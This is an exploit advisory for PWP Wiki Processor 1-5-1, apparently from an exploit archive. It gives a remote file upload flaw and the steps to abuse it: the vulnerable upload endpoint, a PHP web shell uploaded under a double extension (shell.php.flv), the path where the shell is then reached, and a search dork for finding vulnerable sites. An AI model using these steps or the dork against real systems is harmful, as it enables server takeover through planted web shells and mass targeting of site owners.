id: 4646
date: 01/12/2009
title: PWP Wiki Processor 1-5-1 Remote File Upload Vulnerability
author: ahmadbady
cves: 

=========================================================
PWP Wiki Processor 1-5-1 Remote File Upload Vulnerability
=========================================================


  ====remote shell upload====

================================
script: PWP Wiki Processor 1-5-1
   
===========================================================================
download from:http://www.lars-ackermann.de/wiki/static/upload/PWP_1-5-1_en-US.zip
   
===========================================================================
xpl:

www.site..com/path/wiki/run.php?iRequest=upload/UploadList

(upload shell.php.flv)


shell: www.site.com/path/wiki/upload/shell.php.flv
------------------------------------------------------------

dork: "(Powered by PWP Version 1-5-1 )"     &&   inurl:"/wiki/run.php"
  
------------------------------------------------------------  
**************************************************



#  0day.today [2023-03-22]  #